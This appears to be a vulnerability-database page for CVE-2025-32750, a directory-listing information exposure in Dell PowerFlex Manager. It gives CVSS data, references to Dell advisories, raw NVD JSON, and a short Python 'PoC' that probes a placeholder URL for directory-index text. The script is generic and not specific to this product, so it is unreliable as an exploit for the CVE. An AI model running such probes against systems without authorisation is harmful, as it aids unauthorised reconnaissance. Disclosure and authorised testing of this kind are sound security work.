CVE-2025-32750

Description

Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Dell PowerFlex Manager <= 4.6.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Dell PowerFlex Manager Information Exposure through Directory Listing
# Date: 2025-05-20
# CVE: CVE-2025-32750

_target_url = "http://target-ip:port/vulnerable-directory"  # Replace with actual target URL

def check_directory_listing(url):
    try:
        response = requests.get(url, timeout=10)
        # Check if server returns directory listing indicators
        if "Index of /" in response.text or "Directory Listing for" in response.text:
            print(f"[+] Vulnerability confirmed at: {url}")
            print(f"[+] Response snippet:\n{response.text[:500]}")
        else:
            print(f"[-] Directory listing not enabled or path invalid at: {url}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to {url}: {e}")

if __name__ == "__main__":
    check_directory_listing(_target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-32750
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-32750
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-32750/
[4] VulDB https://vuldb.com/cve/CVE-2025-32750
[5] https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities
[6] https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-32750", "sourceIdentifier": "[email protected]", "published": "2026-05-20T16:16:24.803", "lastModified": "2026-05-20T17:30:40.450", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-548"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities", "source": "[email protected]"}]}}